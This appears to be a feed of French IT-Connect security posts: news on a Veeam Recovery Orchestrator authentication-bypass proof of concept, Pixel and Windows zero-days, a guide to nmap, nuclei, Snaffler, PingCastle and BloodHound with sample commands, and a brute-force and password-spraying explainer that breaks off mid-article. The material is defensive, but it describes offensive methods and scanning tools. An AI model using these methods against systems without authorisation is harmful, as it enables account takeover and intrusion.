Un chercheur en sécurité a publié un exploit PoC pour la vulnérabilité CVE-2024-29855 présente dans Veeam Recovery Orchestrator ! En l'exploitant, un attaquant peut outrepasser l'authentification et devenir administrateur ! Faisons le point.

Associée à la référence CVE-2024-29855, cette faille de sécurité critique affecte la solution Veeam Recovery Orchestrator. Intégrée à la solution Veeam Data Platform, cette application sert à faciliter la restauration d'une infrastructure grâce à l'orchestration de tout le processus de restauration.

En exploitant cette vulnérabilité, un attaquant peut outrepasser l'authentification et accéder à l'interface Web de Veeam Recovery Orchestrator (VRO) avec des privilèges d'administrateur. Néanmoins, il y a un prérequis à respecter, comme l'explique Veeam dans son bulletin de sécurité publié le 10 juin 2024 : "L'attaquant doit connaître le nom d'utilisateur et le rôle exacts d'un compte disposant d'un jeton d'accès actif à l'interface Web de VRO pour réaliser le hijacking du compte."

Cette faiblesse est liée à un secret JSON codé en dur qui offre l'opportunité aux attaquants de générer des jetons JWT valides, pour n'importe quel utilisateur existant sur la plateforme, y compris les administrateurs.

Pour vous protéger de cette faille, vous devez utiliser l'une de ces versions (ou une future version supérieure) :

• Veeam Recovery Orchestrator 7.1.0.230
• Veeam Recovery Orchestrator 7.0.0.379

Un exploit PoC disponible pour la CVE-2024-29855

Le chercheur en sécurité Sina Kheirkha a publié un exploit PoC sur GitHub ainsi qu'un rapport technique complet pour expliquer le fonctionnement de cette vulnérabilité.

Bien qu'il soit nécessaire de connaître le nom d'utilisateur et le rôle exact de ce dernier pour exploiter la vulnérabilité, le rapport de Sina Kheirkha montre qu'il n'y a que 5 rôles différents. Voici la liste des rôles : DRSiteAdmin, DRPlanAuthor, DRPlanOperator, et SiteSetupOperator. De ce fait, le script d'exploitation va prendre un nom d'utilisateur et itérer sur la liste des rôles afin de rechercher une correspondance.

Il donne également sa méthode pour tenter d'identifier un nom d'utilisateur valide : "Tout d'abord, le problème de "connaître le nom d'utilisateur" peut être résolu "en quelque sorte" avec la solution suivante, en supposant qu'il existe un utilisateur nommé [email protected], on peut trouver le nom de domaine en regardant le fichier CN du certificat SSL et le nom d'utilisateur peut être sprayed (attaque par pulvérisation), ce qui est un peu boiteux, mais c'est ce que nous avons pour l'instant.

L'exploit PoC étant désormais disponible et accessible à tous, la faille de sécurité CVE-2024-29855 est susceptible d'être exploitée par les cybercriminels dans le cadre d'attaques.

Il y a quelques jours, un exploit PoC pour la CVE-2024-29849 présente dans Veeam Backup Enterprise Manager a été publiée par ce même chercheur en sécurité.

Source

The post Faille de sécurité critique dans Veeam Recovery Orchestrator : un code d’exploitation a été publié ! first appeared on IT-Connect.

I. Présentation

Dans cet article, je vous propose un ensemble d'outils et de ressources permettant d'évaluer et de tester la sécurité de votre système d'information. Mon objectif de fournir aux administrateurs système les principaux outils que je juge utiles et techniquement abordables pour réaliser cette tâche.

L'objectif de sécurisation de son système d'information peut paraitre abstrait ou lointain lorsque l'on ne se frotte pas quotidiennement à la cybersécurité, qui est devenue un métier à part entière de l'informatique au sens général. Néanmoins, chaque acteur du système d'information a son rôle à jouer au sujet de la cybersécurité, de manière plus ou moins forcée en fonction des budgets, tailles d'équipe ou autres contraintes spécifiques à chaque cas et entreprise.

L'idée de cet article est de vous fournir les premiers éléments de réponse et options à suivre pour vous lancer sur ce chemin, notamment si vous souhaitez ou devez ajouter une corde "cybersécurité" à votre arc sans pour autant devenir un expert à plein temps sur le sujet.

La connaissance de ces outils et ressources présentées dans cet article n'est, en soit, pas suffisante pour la réalisation d'un test d'intrusion ou d'une opération red team en bonne et due forme. En revanche, ceux-ci sont tout à fait maitrisables pour des administrateurs systèmes et réseau, et, utilisés de manière relativement standard, pourront déjà permettre de détecter et de corriger les vulnérabilités les plus visibles d'un système d'information.

Cette liste contient uniquement des outils gratuits ou utilisés dans leur version gratuite, pour plusieurs raisons, la principale étant la volonté de partager des solutions utiles et utilisables par tous.

II. Disclaimer

Quel que soit l'outil dont il est question, il est important d'être au fait qu'une simple exécution occasionnelle sans analyse précise ou capacité à interpréter les résultats ne sert à rien. Soyez bien clair sur plusieurs points :

• Avant d'utiliser n'importe lequel de ces outils, il faut être certains de comprendre ce pour quoi il est fait, ce qu'il est capable de détecter, voire d'exploiter, et quelles sont ses limites (faux positifs, périmètre d'action). S'il y a une quelconque incompréhension de votre part concernant la description de l'outil et son fonctionnement global, c'est qu'il n'est pas encore temps de l'utiliser en conditions réelles.
• Il est aussi important d'être capable d'interpréter les résultats de chacun de ces outils afin de comprendre ce qui est urgent, ce qui est incertain, ce qui est secondaire, etc. À ce titre, il faut être conscient de ses propres limites quant à leur utilisation et l'interprétation de leur résultat.
• L'utilisation de ces outils, pour certains offensifs, ne doit être effectuée uniquement sur des cibles pour lesquelles vous disposez d'une autorisation explicite. Pour rappel : Code pénal : Chapitre III : Des atteintes aux systèmes de traitement automatisé de données

L'utilisation de ces outils peut ainsi être un premier pas vers une phase de diagnostic ou de contrôle routinier de la sécurité du système d'information. Cependant, elle ne peut pas être un substitut à l'analyse d'un expert en cybersécurité, qu'il soit interne ou externe à l'entreprise. Par exemple, l'utilisation avec les options "standard" ou "par défaut" peut vous faire passer à côté d'une vulnérabilité qui ne serait détectable qu'à travers une analyse approfondie, ou l'utilisation d'options plus avancées.

Il est donc important d'être en phase avec ces différents points pour éviter d'avoir un faux sentiment de sécurité. Cet avertissement étant fait, nous pouvons passer à la suite !

III. Ma liste d'outils pour sécuriser SI en tant qu'administrateur système

A. Scan réseau : nmap

nmap est la référence absolue des outils de scan réseau ! Il permet d'effectuer une reconnaissance et une cartographie du système d'information en découvrant les hôtes accessibles sur un réseau local ou distant ainsi que les services exposés. À ce titre, il permet également d'effectuer une analyse de cloisonnement pouvant exister entre deux réseaux en évaluant de manière pragmatique l'efficacité et l'exhaustivité d'une politique de filtrage.

L'utilisation de nmap peut donc permettre de voir si un hôte situé sur un réseau peut accéder aux services d'un autre hôte du réseau local ou sur un réseau distant. Voici, en exemple, une commande classique d'utilisation de nmap et les résultats d'un scan sur un hôte unique, visant à découvrir les services exposés et procéder à des premières actions d'énumération sur ceux-ci :

On retrouve notamment différentes colonnes indiquant, dans l'ordre : le protocole et port scanné, son status (open/closed/filtered), le service correspondant et une éventuelle bannière indiquant la technologie utilisée et sa version lorsque les scripts nmap ont réussi à les identifier avec précision.

En plus de ces fonctionnalités principales, nmap possèdent également de nombreux modules sous forme de scripts qui permettent de détecter les types de services exposés (est-ce un service web, un service SSH ou RDP ? etc...), mais également leur version. Ces scripts, écrits en LUA et utilisables tels quels, permettent également d'effectuer un scan de vulnérabilité élémentaire, par exemple, en relevant la présence d'une version obsolète, d'une authentification anonyme ou la présence d'une configuration particulière vulnérable.

De manière élémentaire, nmap peut aider à répondre aux questions suivantes :

• Pour un poste situé dans le réseau "utilisateur", combien de systèmes et services de mon système d'information lui sont accessibles ?
• La politique de filtrage et de cloisonnement que j'ai définie est-elle implémentée telle qu'attendu ?
• Si un attaquant prend le contrôle d'un poste de l'équipe RH, peut-il directement joindre mon serveur de sauvegarde ?
• Existe-t-il des services exposés sur le réseau "serveurs" qui ne sont pas à jour ?
• Y-a-t-il sur mon réseau des services SMB ou FTP accessibles en authentification anonyme ?

Enfin, celui-ci nécessite forcément des connaissances en systèmes et en réseau. C'est notamment le cas lorsqu'il s'agit de tester la bonne application d'une politique de filtrage réseau ou d'identifier les services exposés grâce à leur port (TCP/UDP). La sortie qu'il produit peut dans un premier temps paraitre non intuitive, mais le résultat est en fait assez claire, si l'on prend la peine de s'y familiariser.

• Lien vers l'outil : Site officle de nmap

Apprenez à utiliser Nmap avec notre cours complet :

• Cours Nmap

B. Scan web : nuclei

Nuclei fait partie de mes outils préférés lorsqu'il s'agit de faire des scans web automatisés et de dégrossir l'analyse d'un grand nombre de cibles, principalement parce que j'apprécie son fonctionnement modulaire et le développement communautaire de ses templates de test. Il s'agit d'un scanner utilisant des modules écrit en Yaml écrit par la communauté.

Il est très simple d'utilisation et plutôt efficace. Son objectif est de vous permettre de scanner un ou plusieurs sites en effectuant un grand nombre de tests qui sont clairement définis. Ces tests, sous forme de module donc, sont majoritairement orientés autour :

• de la détection de version et la présence de logiciels, plugins ou dépendances obsolètes.
• de la présence de défaut de configuration, tels que le Directory Listing, l'absence d'options de sécurité sur les cookies, l'absence d'en-tête de sécurité au niveau du service web, etc.
• la recherche de fichiers sensibles qui ne devraient pas être exposés, comme un fichier "docker-composer.yml" contenant un mot de passe, un fichier "phpinfo()", etc.
• la découverte de CVE reposant sur des éléments de détection simples.

Voici un exemple d'utilisation de nuclei, qui peut aussi bien prendre en entrée un site web qu'un fichier contenant plusieurs centaines de domaines :

# Scanner un site web
nuclei -u https://www.monsiteweb.fr
# Scan les URL/domaine inscrits dans un fichier
nuclei --list /tmp/url.txt

Nuclei va faire une analyse en utilisant ses modules (appelés templates). Nous pouvons spécifier ceux que nous souhaitons utiliser via les options, ou laisser nuclei les choisir automatiquement en fonction de ses découvertes. Si nuclei détecte les traces du CMS WordPress, il va automatiquement exécuter tous les modules portant le tag "wordpress".

Voici un exemple d'utilisation d'un module. Nous souhaitons effectuer une vérification très précise sur toutes nos applications web exposées, en recherchant l'exposition d'un "PhpMyAdmin" :

nuclei --list /tmp/url.txt -t http/exposed-panels/phpmyadmin-panel.yaml

C'est cette possibilité de pouvoir sélectionner précisément un test ou catégorie de test sur un site précis ou un grand ensemble de site qui le rend très pratique d'utilisation. Voici, par exemple, le cas d'utilisation de toute une catégorie de template permettant de rechercher les technologies à partir du contenu des pages web et des bannières. On spécifie ici une catégorie qui contient plus de 300 modules :

Au delà des simples découvertes de bannières ou de fichiers, certaines catégories de modules sont orientées sur la découverte de CVE, voici un exemple :

Vous pourrez en apprendre plus sur les templates de test nuclei simplement en parcourant leur configuration Yaml : Github - Nuclei-templates

Il faut cependant être conscient de la limite des scans automatisés : ceux-ci sont très surfaciques et permettent uniquement de relever des vulnérabilités basiques. Ne vous attendez pas, par exemple, à découvrir une injection SQL ou un problème de cloisonnement des droits entre profils utilisateurs grâce à nuclei. Vous serez en revanche certain d'avoir des résultats et des éléments à corriger si vous exécutez ce genre de scan pour la première fois sur un SI qui n'a jamais été à l'épreuve d'une cyberattaque/d'un audit.

Dans la réalité d'un test d'intrusion ou d'une opération red team, les scans automatisés sont utilisés pour dégrossir le travail, repérer les cibles les plus faibles et avoir une première idée du niveau de sécurité global. Ils sont rarement, voir jamais utilisés dans le cadre de cyberattaques réelles pour des problématiques évidentes de discrétion.

• Lien vers l'outil : Github - ProjectDiscovery/Nuclei

Apprenez à utiliser Nuclei avec notre tutoriel complet :

• Tutoriel - Nuclei - Rechercher des vulnérabilités dans une application web

C. Analyse des partages et permissions avec Snaffler

Snaffler est un exécutable Windows qui vise à automatiser la découverte des partages de fichiers des systèmes sur un domaine, puis la recherche d'informations sensibles dans ces partages. Ses règles par défaut, qui sont hautement personnalisables, sont orientées autour des fichiers techniques contenant des mots de passe, des configurations, des archives, crashdump, disques virtuels, etc. Tout type de fichier dans lequel un attaquant pourrait trouver des informations intéressantes.

C'est un outil très efficace qui ne manque jamais à remonter des informations intéressantes, tant la tâche de sécurisation et difficile à atteindre. Il permet notamment d'automatiser une tâche colossale : naviguer dans la totalité des partages de fichiers, dossiers et sous-dossiers d'un système d'informations. Exécuter régulièrement sur un système d'informations, en utilisant des comptes utilisateurs de privilèges différents, il permettra d'être un peu plus confiant sur l'absence d'informations sensibles dans les partages de fichiers, notamment ceux accessibles en lecture par tous les utilisateurs du domaine.

Voici un exemple de lancement de Snaffler et des premiers résultats qu'il peut afficher (Cliquez sur l'image pour zoomer) :

Dans cet exemple, on voit que Snaffler réalise dans un premier temps une énumération et recherche des partages de fichiers des systèmes de mon domaine, puis recherche des données sensibles à l'intérieur de ceux-ci. La dernière ligne (marquées en {Red}) est une trace typique de la découverte d'un mot de passe dans un script accessible dans le partage concerné.

• Lien vers l'outil : Github - SnaffCon/Snaffler

Apprenez à utiliser Snaffler avec notre tutoriel complet :

• IT-Connect - Analysez vos partages de fichiers Active Directory avec Snaffler pour protéger vos données

D. Diagnostique et conformité de l'Active Directory avec PingCastle

PingCastle est un exécutable Windows orienté autour des vérifications de conformité et de bonnes pratiques de configuration de l'Active Directory, élément plus que central dans la sécurisation d'un système d'information. Dans son utilisation la plus commune, il permet de faire une analyse globale de la sécurité de l'AD suite une collecte d'information automatisée. Cette analyse porte notamment sur les utilisateurs, groupes, système d'exploitation, GPO, les permissions et appartenance aux groupes, mais aussi des éléments plus techniques comme la conformité à l'état de l'art concernant des paramètres bien précis :

Lors de l'analyse de la sécurité d'un système d'information, il s'agit réellement d'un incontournable sur le sujet. Une des grandes forces de l'outil est également son rapport, au format web, qui contient une notation globale, une catégorisation des points de vérification et faiblesses découvertes, ainsi que des recommandations et références externes qui permettent de mieux comprendre l'impact des faiblesses découvertes et le sens des recommandations proposées.

Son utilisation est, elle aussi, très simple, depuis un poste intégré au domaine, voici comment l'exécuter :

.\Pingcastle.exe --healthcheck

Comme vous le voyez dans la sortie ci-dessous, celui-ci va réaliser une collecte et une analyse des données de l'Active Directory. il produira ensuite un rapport HTML :

Enfin, voici un exemple de résultat. Ce premier exemple vous montre la synthèse générale du niveau de risque du domaine déterminé par PingCastle à la suite de son analyse :

Ce second exemple vous expose le cas d'une vulnérabilité précise, avec notamment une description, un détail de l'impact, de la recommandation, des objets concernés :

N'hésitez pas ici à consulter les ressources qui sont référencées par PingCastle pour en apprendre plus sur ce qu'est, dans cet exemple, la vulnérabilité ASREPRoast (ou alors, consultez notre article sur le sujet : IT-Connect - Sécurité de l’Active Directory : comprendre et se protéger de l’attaque ASREPRoast).

Une bonne pratique consiste, par exemple, à réaliser une analyse tous les trimestres et de prendre en compte les recommandations proposées, en commençant bien sûr par les plus urgentes.

• Lien vers l'outil : SIte officiel - PingCastle

Pour aller plus loin dans la compréhension de ce très bon outil, je vous oriente vers nos articles sur le sujet, ainsi que vers Purple Knight qui est une alternative :

• IT-Connect - Comment auditer l’Active Directory avec PingCastle ?
• IT-Connect - Sécurité Active Directory : comment atteindre un score de 0/100 dans PingCastle ?
• IT-Connect - Comment auditer l'Active Directory avec Purple Knight ?
• Youtube - IT-Connect : Auditez votre Active Directory en 5 minutes avec PingCastle !

E. Recherche des chemins d'attaque dans l'Active Directory avec BloodHound

Bloodhound est une application web couplée à une base Neo4j qui permet de visualiser les relations qui existent entre les nombreux objets d'un domaine (utilisateurs, groupes, ordinateurs, etc.) et d'y rechercher des chemins d'attaque. Il permet notamment de répondre à une complexité inhérente aux annuaires Active Directory, qui est la succession de relations qui peuvent exister entre plusieurs objets, par l'intermédiaire d'appartenance à des groupes, de présence de session sur un poste, de privilèges et ACL spécifiques, etc. Grâce à BloodHound, ces relations parfois très indirectes, mais bien existantes peuvent être identifiées et visualisées simplement. Voici un exemple :

Ce type de relation, qui permet de comprendre que l'utilisateur "[email protected]" est finalement membre du groupe "ADMINS DU DOMAINE" de façon indirecte, n'est pas aisée à visualiser, encore moins à découvrir à l'aide des outils natifs Microsoft. Dans la réalité, cela représente un chemin potentiel pour un attaquant, qui, ayant compromis le compte utilisateur initial, fini par obtenir le plus haut niveau de privilège au sein du domaine : Administrateur du domaine.

BloodHound est un outil puissant, initialement créé par des attaquants/pentesters, mais qui est très utile entre les mains des administrateurs de l'Active Directory une fois maitrisé. Il permet de découvrir des chemins d'attaque parfois complexes et insoupçonnés, notamment grâce à une nouvelle façon de parcourir, visualiser et rechercher dans les données (la théorie des graphes).

Dans les grandes lignes, BloodHound va se baser sur les données de l'Active Directory, que l'on devra collecter pour lui via un agent appelé Collecteur. Il va ensuite stocker ces données dans une base de données neo4j, utilisant le langage de base de données Cypher pour y appliquer des recherches et des filtres, et un front-end en Sigma.js/Go nous permettra de les afficher et de les manipuler. Voici un exemple plus complet et réaliste (cliquez sur l'image pour zoomer) :

Cette vue vous montre de nombreux chemins d'attaque avec des nœuds de différents types (OU, Ordinateur, Utilisateur) et des relations différentes entre ces nœuds (possibilité d'ajouté un membre, de changer un attribut, de lire les attributs sensibles, de se connecter en RDP, d'être propriétaire d'un autre objet, etc.).

• Lien vers l'outil : Github - BloodHound

Pour maitriser cet outil de A à Z, je vous oriente vers notre cours gratuit dédié à BloodHound :

• Cours BloodHound

IV. Les ressources

L'idée à travers le partage de ces ressources est de vous fournir une liste de bases de connaissances utiles pour comprendre et interpréter les résultats fournis par les outils listés ci-dessus. Également, certaines d'entre elles pourront vous orienter vers les principaux tester à réaliser, ou vous fournir des éléments complémentaires de compréhension concernant les remédiations.

A. Active Directory Mindmap

Cette mindmap, que je vous conseille d'ouvrir localement avec le logiciel "Xmind", représente de manière très concrète la démarche globale et les différentes opérations classiques d'un attaquant. Elle a été conçue par des experts en cybersécurité et tests d'intrusion comme un pense-bête ou méthodologie pour la réalisation d'un test d'intrusion. Un test d'intrusion étant une prestation consistant à simuler une cyberattaque sur un système d'information d'entreprise, la démarche, les outils et les attaques menées sont très proches de la réalité.

Ainsi, suivre la lecture de cette mindmap vous donnera une idée de ce qui peut être tenté par les attaquants si vous n'êtes pas familier de la sécurité offensive, avec autant de points de sécurisation et de contrôle potentiels. Ce genre d'outil, fait pour les attaquants, présente l'avantage par rapport aux guides de bonnes pratiques de se baser uniquement sur actions réelles et concrètes.

Pour une personne non experte en cybersécurité, cette mindmap peut être difficile à appréhender et à comprendre dans son ensemble. Mais, l'étudier permettra cependant de retrouver, pour partie, certains des outils exposés dans cet article ou des types de faiblesses et d'attaques que les outils de globaux de scan comme PingCastle, nuclei ou nmap peuvent identifier.

L'exemple ci-dessus vous montre une partie des tests réalisés en boite noire, c'est-à-dire sans compte sur le domaine et en étant uniquement connecté au réseau interne de l'entreprise. On y retrouve bien sûr l'utilisation de l'outil nmap pour la réalisation d'une cartographie du réseau.

• Lien vers la ressource : Github - Orange Cyberdéfense AD Mindmap

B. Framework MITRE ATT&CK

Le framework ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) du MITRE est une base de connaissances des techniques d'attaque maintenue et mise à jour grâce aux observations et investigations des cyberattaques effectuées à travers le monde. Elle vise à fournir à tous un référentiel des opérations des attaquants afin de mieux les comprendre, les étudier, et s'en protéger.

Vous trouverez notamment dans cette base de données, un peu intimidante au début, de nombreuses informations sur ce qu'un attaquant est capable et susceptibles de réaliser comme attaque sur un système d'information :

Plusieurs des outils cités dans cet article utilisent notamment des références au MITRE ATT&CK et ses TTP (Tactics, Technics & Procedures, nom donné à chaque type d'attaque référencé) pour expliciter la menace que représente un défaut de configuration ou une autorisation trop permissive.

Voici un exemple de TTP, qui explicite l'attaque consiste à effectuer un brute force de mot de passe sur un compte utilisateur :

Chaque TTP contient notamment une description, des outils susceptibles d'être utilisé, des exemples de groupes de cyberattaques réels ayant utilisé cette technique par le passé et une liste de recommandation pour se protéger et détecter l'opération en question :

• Lien vers la ressource : framework MITRE ATT&CK

C. Points de contrôle Active Directory

Le référentiel de l'ANSSI sur les points de contrôle de l'Active Directory est également une très bonne ressource à connaitre pour évaluer la sécurité de son domaine.

En complément des outils d'analyse comme PingCastle et BloodHound, le contenu des recommandations proposées et leur priorisation permet d'avoir une base de travail pour analyse la sécurité de son Active Directory et expliciter certains points identifiés par les outils cités dans cet article :

Les différents points de contrôle y sont triés par priorité et accompagnés d'une recommandation pour vous orienter sur l'application des correctifs. Vous pourrez parfois faire un lien direct entre les points de contrôle PingCastle est ceux de l'ANSSI.

• Lien vers la ressource : ANSSI - Points de contrôle Active Directory

V. Conclusion

Nous avons fait le tour de ce que je considère être les principaux outils offensifs que les administrateurs système et réseau peuvent utiliser afin de prendre la température du niveau de sécurité de leur système d'information. Il en existe beaucoup d'autres, souvent plus complexes, mais maitriser ceux présentés ici vous fera certainement avancer dans le bon sens quant à la sécurité de votre système d'information et de votre domaine.

N'hésitez pas à utiliser les commentaires et le Discord pour partager votre avis !

The post Sécuriser son SI : Top 2024 des outils indispensables pour les sysadmins first appeared on IT-Connect.

Avis aux utilisateurs de smartphones Google Pixel : une faille de sécurité importante déjà exploitée au sein de cyberattaques a été corrigée par Google ! Voici ce qu'il faut savoir.

Google a mis en ligne un énorme patch de sécurité pour corriger près de 50 vulnérabilités dans le firmware de ses appareils Pixel. Elles viennent s'ajouter à celles corrigées dans Android. L'une de ces failles de sécurité mérite une attention particulière : la CVE-2024-32896. Considérée comme importante, elle permet d'effectuer une élévation de privilèges sur l'appareil Pixel.

Avant même que ce correctif soit mis en ligne par Google, elle aurait été exploitée en tant que faille zero-day par des cybercriminels. Dans le bulletin de sécurité publié par l'entreprise américaine, voici ce que nous pouvons lire : "Il semblerait que CVE-2024-32896 fasse l'objet d'une exploitation limitée et ciblée." - Comme à son habitude, Google n'a pas donné de précisions supplémentaires afin de protéger ses utilisateurs. Mais, cette phrase laisse entendre qu'il s'agirait d'attaques ciblées.

Le correctif de juin 2024 pour les appareils Pixel est déjà disponible et Google a commencé à le distribuer auprès de ses appareils. Bien entendu, les utilisateurs sont encouragés à installer cette mise à jour dès que possible : "Tous les appareils Google pris en charge recevront une mise à jour au niveau du correctif 2024-06-05. Nous encourageons tous les clients à accepter ces mises à jour sur leurs appareils."

Bien que Google soit à l'origine des appareils Pixel et du système d'exploitation Android, il y a des mises à jour distinctes pour les deux produits. En effet, bien que les smartphones Pixel tournent sur Android, ils utilisent une plateforme matérielle spécifique à Google qui implique des correctifs dédiés. Que ce soit pour la sécurité ou les simples bugs.

Arm : une alerte du côté du GPU Mali

Par ailleurs, des chercheurs en sécurité ont émis une alerte au sujet d'une faille de sécurité présente dans le pilote du noyau du GPU Arm Mali. Associée à la référence CVE-2024-4610, cette vulnérabilité serait activement exploitée dans la nature. Vous pouvez retrouver le bulletin de sécurité sur cette page.

Enfin, voici les produits affectés :

• Bifrost GPU Kernel Driver : toutes les versions de r34p0 à r40p0
• Valhall GPU Kernel Driver : toutes les versions de r34p0 à r40p0

Source

The post Google Pixel : une faille de sécurité exploitée dans des cyberattaques ciblées ! first appeared on IT-Connect.

Un nouveau rapport de Symantec laisse entendre que le gang de ransomware Black Basta aurait exploité une faille de sécurité dans Windows avant même que celle-ci soit connue et corrigée par Microsoft. Elle facilite l'élévation de privilèges sur une machine Windows. Faisons le point !

Si vous n'avez pas installé les mises à jour Windows sur vos postes de travail et serveurs depuis plusieurs mois, cet article pourrait bien vous faire changer d'avis. La faille de sécurité CVE-2024-26169, corrigée par Microsoft le 12 mars 2024 via le Patch Tuesday, aurait été exploitée en tant que zero-day par les cybercriminels de Black Basta.

Présente dans le service de signalement des erreurs de Windows (Windows Error Reporting Service), cette vulnérabilité permet à un attaquant d'élever ses privilèges en tant que "SYSTEM" sur une machine locale. C'est d'ailleurs précisé sur le site de Microsoft : "Un attaquant qui parviendrait à exploiter cette vulnérabilité pourrait obtenir les privilèges SYSTEM."

Une faille de sécurité exploitée par le ransomware Black Basta

Bien que Microsoft considère que cette faille de sécurité n'est pas exploitée par des pirates, le dernier rapport de Symantec affirme le contraire. D'ailleurs, voici la première phrase de ce rapport : "Certains éléments suggèrent que des attaquants liés à Black Basta ont compilé l'exploit CVE-2024-26169 avant la sortie du correctif" (de Microsoft).

Récemment, les experts de Symantec ont analysé un outil d'exploitation utilisé au sein de plusieurs cyberattaques. Tout porte à croire que cet outil a été compilé et exploité bien avant que le patch de Microsoft soit disponible.

Au-delà de son fonctionnement purement technique, ce qui est intrigant, ce sont les horodatages de compilation des deux versions de l'outil d'exploitation analysées par Symantec. Le premier est daté du 27 février 2024, tandis que le second a été compilé encore plus tôt, le 18 décembre 2023. Soit entre 14 et 85 jours avant la publication du correctif de sécurité de Microsoft !

Cet horodatage est modifiable, mais Symantec pense que ce n'a pas été le cas ici : "Toutefois, dans le cas présent, les auteurs de l'attaque ne semblent guère motivés pour modifier l'horodatage à une date antérieure.", peut-on lire.

Cet exploit a été utilisé pour compromettre des machines sous Windows par l'intermédiaire de la CVE-2024-26169. Pour se protéger, il est nécessaire de mettre à jour Windows : la vulnérabilité en question a été corrigée avec les mises à jour cumulatives de mars 2024. Elle affecte Windows et Windows Server.

Source

The post Le ransomware Black Basta aurait exploité une faille Windows en tant que zero-day ! first appeared on IT-Connect.

I. Présentation

Dans cet article, nous allons nous intéresser aux attaques par brute force qui peuvent être menées sur les comptes utilisateurs d'un Active Directory, d’une application web ou de tout autre service réseau.

Nous verrons en quoi consistent ces attaques et quel est le but recherché par l'attaquant, nous parcourrons les différents types de brute force qui existent et peuvent être exploités lors d'une cyberattaque en fonction de l’objectif et du niveau de discrétion recherchés. Nous aborderons enfin les principales mesures à prendre pour s'en protéger.

II. Qu'est-ce qu'une attaque par brute force ?

Une attaque par brute force, appelée aussi "bruteforce attack" ou attaque par force brute, consiste pour un attaquant à tenter d’obtenir les identifiants d’un compte utilisateur en essayant une multitude de mots de passe sur un même login. Une telle attaque se caractérise surtout par le nombre d’essais que l’attaquant va réaliser afin de tenter de compromettre un compte. Le plus souvent, il va utiliser des dictionnaires de mots de passe (appelés “wordlist”), composés de plusieurs milliers ou millions de lignes, chacune étant un mot de passe potentiel.

Dans le cadre d'une cyberattaque, l'attaquant va utiliser le brute force afin de compromettre facilement des comptes utilisateurs qui possèdent un mot de passe faible. Cette opération peut être menée en tant que première étape d'une intrusion (par exemple, sur les services de l'entreprise exposés sur Internet) ou alors en visant des services internes à l'entreprise après une première compromission.

Un “identifiant” étant composé d’un login (nom d'utilisateur) et d’un mot de passe, le fait de connaître le login est déjà une information intéressante pour un attaquant, puisqu’il va déjà être en possession de 50% de l’information nécessaire à la compromission d’un compte.

Plus concrètement pour compromettre le compte ayant le login "admin", un attaquant va essayer le couple “admin : password”, puis “admin : admin”, puis “admin : superMDP123!”, etc. Pour qu’une attaque digne de ce nom soit menée, l’attaquant automatisera le processus grâce à des programmes conçus pour ce genre d’opérations et adaptés au contexte (application web, service SSH, SMB, etc.), lui permettant de réitérer son opération d'authentification rapidement et sans effort.

Imaginez avoir en énorme trousseau de clés en main et une serrure verrouillée en face de vous. Le fait de tester toutes les clés une à une est précisément la définition d'un brute force.

Certains outils permettent aujourd’hui de tenter des milliers de combinaisons par seconde depuis un simple ordinateur. Parmi ces outils, on peut notamment citer “hydra”, “netexec” ou “metasploit”.

Le brute force est une technique d’attaque connue et fréquemment utilisée. Elle est référencée dans le framework MITRE ATT&CK sous le TTP T1110 :

• MITRE ATT&CK : T1110 – Brute Force

Cette page vous permettra notamment de trouver de nombreux cas réels d’utilisation du brute force dans des attaques étatiques ou d’envergures :

Par exemple, les attaques par brute force font partie de la méthodologie du groupe APT29 (groupe d’espionnage affilié à la Russie et ciblant les pays de l’OTAN) d’après le framework MITRE ATT&CK :

• MITRE ATT&CK – APT 29

III. Les différents types d’attaques par brute force

A. Le brute force "classique"

La plupart du temps, une attaque par brute force va cibler plusieurs comptes utilisateur, cela afin de maximiser les chances de trouver un compte ayant un mot de passe faible. L’attaquant disposera alors d’une wordlist de login (vérifiés ou potentiels) et d’une wordlist de mots de passe. Il va donc tenter chaque combinaison “login : mot de passe” :

Dans les faits, les attaque par brute force peuvent cibler tout service ou application utilisant le login et le mot de passe comme facteurs d’authentification et étant insuffisamment protégé. Cela concerna donc aussi bien les applications web et leur page de login classique, les services SSH ou encore au sein d’un système d’information l’Active Directory, qui propose à lui seul de nombreux services permettant une authentification (Kerberos, SMB, RPC, LDAP, WinRM, RDP, etc.) et joue, entre autres, le rôle d'autorité d'authentification au sein d'un domaine.

Il faut ici se représenter le nombre de tentatives d’authentification que génère ce type d’attaque. Si je dispose d’une liste de 100 logins sur lesquels je souhaite tester 20 000 mots de passe. Cela signifie que mon attaque va générer 2 millions de tentatives d’authentification.

Pour être plus précis, ce type de brute force est décrit le framework MITRE ATT&CK en tant que "Bruteforce: password guessing", car l'on tente de deviner le mot de passe d'un utilisateur de façon agressive :

• T1110.00 - Bruteforce: Password Guessing

B. Le brute force ciblé

Il existe également des cas où l’attaquant va vouloir cibler un compte bien identifié, on parle alors d’attaque ciblée. Ce cas de figure s’observe notamment quand l’attaquant a identifié un compte particulièrement sensible ou hautement privilégié.

Également, ces attaques sont utilisées lorsque les services ou applications utilisent encore un compte d’administration par défaut. Par exemple, le compte “admin” d’une application web qui est le premier compte existant sur toutes les instances de celle-ci. On peut également mentionner le compte “administrateur/administrator” dans les environnements Windows (local ou au niveau du domaine).

Lors d’une attaque par brute force ciblée, l’attaquant ne va cibler qu’un seul (ou un nombre réduit) compte utilisateur, mais toujours utiliser un dictionnaire de mot de passe. Il mise alors sur le fait que ce compte précis possède un mot de passe faible, présent dans sa wordlist :

Ce type d’attaque génère naturellement moins de requêtes (cela dépend toujours du dictionnaire de mot de passe utilisé), mais n’en est pas moins efficace si le compte ciblé possède effectivement un mot de passe faible. Voici la démonstration d’une attaque par brute force ciblée sur un service SMB dans un environnement Windows Active Directory, le compte ciblé est toujours le même “IT-CONNCET.TECH\KATY_CRAFT”, mais le mot de passe change à chaque essai :

Comme vous le voyez dans cet exemple, l’outil utilisé va tenter plusieurs mots de passe et cibler le compte “IT-CONNECT.TECH\KATY_CRAFT”, jusqu’à trouver la bonne combinaison.

C. Le password spraying

Un troisième type d’attaque par brute force existe et est notamment utilisée dans le cadre des intrusions en environnement Active Directory : le password spraying.

Cette attaque consiste à tenter de s’authentifier sur de multiples comptes à l’aide d’un seul mot de passe (ou une liste très réduite de mots de passe). Le cas le plus parlant est celui où l’attaquant parvient à obtenir le fameux “premier mot de passe par défaut” qu’un administrateur peut assigner à chaque nouvel utilisateur et qu’il doit changer au plus vite, un mot de passe en général très complexe tel que “Bienvenue01.” ou “ChangezMoi!”.

En tombant sur de tels mots de passe, un attaquant peut se dire que d’autres comptes, nouvellement créés ou jamais utilisés, ont également ce mot de passe, il va donc tenter de s’authentifier sur chaque compte de l’Active Directory avec celui-ci.

